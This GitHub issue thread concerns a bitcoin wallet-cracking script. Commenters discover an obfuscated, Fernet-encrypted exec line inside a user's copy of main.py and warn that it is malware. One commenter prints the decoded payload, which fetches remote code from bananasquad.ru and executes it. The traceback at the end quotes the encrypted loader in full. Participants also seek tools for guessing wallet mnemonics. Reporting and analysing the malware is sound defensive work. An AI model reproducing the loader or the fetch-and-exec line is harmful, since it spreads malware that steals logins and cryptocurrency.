-
Notifications
You must be signed in to change notification settings - Fork 57
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SyntaxWarning: invalid escape sequence '\(' `-._____.-'""") #20
Comments
fyi, that Fernet encrypted code is probably running a malware on your computer and adding it to the startup folder, so that it steals your logins infos and cryptos. |
how would it install malware? you have the whole source code where is it installing malware? |
if anyone actually gives a shit, just get the Fernet code, log it into a file with ".decode('utf-8'))" at the end and you will see the following: |
Bro i am not a programmer or a developer,i scanned with Tron script and
removed that malware and some entries in regedit
but for your information these fernet came through some of
similiar projects like btc wallet cracker, litecoin wallet cracker, eth
wallet cracker type github files, i dont know which one is, but now my pc
is 100% cleaned.....
i dont know if it was a malware or whatever, i just shared what i saw with
your program....
…On Wed, Oct 11, 2023 at 6:06 AM André Lopes ***@***.***> wrote:
if anyone actually gives a shit, just get the Fernet code, log it into a
file with ".decode('utf-8'))" at the end and you will see the following:
exec(requests.get('https://bananasquad.ru/paste').text.replace(
'<pre>','').replace('</pre>',''))
just search on the internet for bananasquard.ru '-'
—
Reply to this email directly, view it on GitHub
<#20 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AWLJ46PSGHFG5SA7CVXSTQ3X6XWJ7AVCNFSM6AAAAAA5SDX2GGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTONJWGU3DIMJTGI>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
there is no fernet code in my py script so what are you getting at |
could the site I'm scraping from be the problem? |
As i said bro i was testing different tools as you know it's even
impossible to be lucky one to get a hit ,,,, i tried Pymmdraza bcz he have
a lot of paid version tools also and very good tools too, i don't know
maybe some other tools while installation or installing their
requirements.txt files i get infected but now i have cleaned pc sorry for
any kind of embarrassment to you or the project...
os is there any really tool that can do this job with a laptop 16gb ram
core i5 4 core pc
or its just a hoax,,, bcz mnemonic phrase or words are easy method to crack
any wallet
I'm just looking for a tool to try my luck.....
…On Wed, Oct 11, 2023 at 3:55 PM clout ***@***.***> wrote:
could the site I'm scraping from be the problem?
as I said, the project has not been updated since over a year and the
website used to look like this:
https://web.archive.org/web/20220814121727/https://www.bitcoinlist.io/
and now it's down...
—
Reply to this email directly, view it on GitHub
<#20 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AWLJ46N2ZV4QNNULREKA353X6Z3LTANCNFSM6AAAAAA5SDX2GE>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
is this possible to get this tool more faster............. |
so the code on top is not from my tool right? |
Hey, yes you are right @cloutjs sorry for some problem caused, but the code reported on the first message in this issue contains malware, not your project! I'm sorry, but for real, be really careful with that code and with PRs from people you don't know 😄 |
no problem man really, I was so confused at first too haha |
the api does not work anymore, bitcoinlist.io is down and qcoinz.com is returning errors, do you have any new site to use? |
main.py:48: SyntaxWarning: invalid escape sequence '('
`-._____.-'""")
Bitcoin-Wallet-Miner-main\main.py", line 6, in
import requests ;exec(Fernet(b'7n_miwaUaVYiBEyp9OccQrqxxofGLIvTrPItavlF7TQ=').decrypt(b'gAAAAABk8gbNQAS0dUKTcVbTWBEKC3IrVt8cNepeHlzyFMMgKS1vjegT-M9d13z5gSthEuuwQHFs5sKfO7E28CiyXemLCQK2wNEuXuH7p9AvOMLjMcRuynqKAF0mTlgU9Z-Nmh8a-mg5i1-cfgPsnJ4tUae8RWTWtloE1KPoULA9EexeDMAXgPvSJ2E-3po8D28BgNbfS9-4npnrI4k9zNTJ99WK1ssj6Q=='))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "", line 1, in
File "", line 30
^
SyntaxError: leading zeros in decimal integer literals are not permitted; use an 0o prefix for octal integers
The text was updated successfully, but these errors were encountered: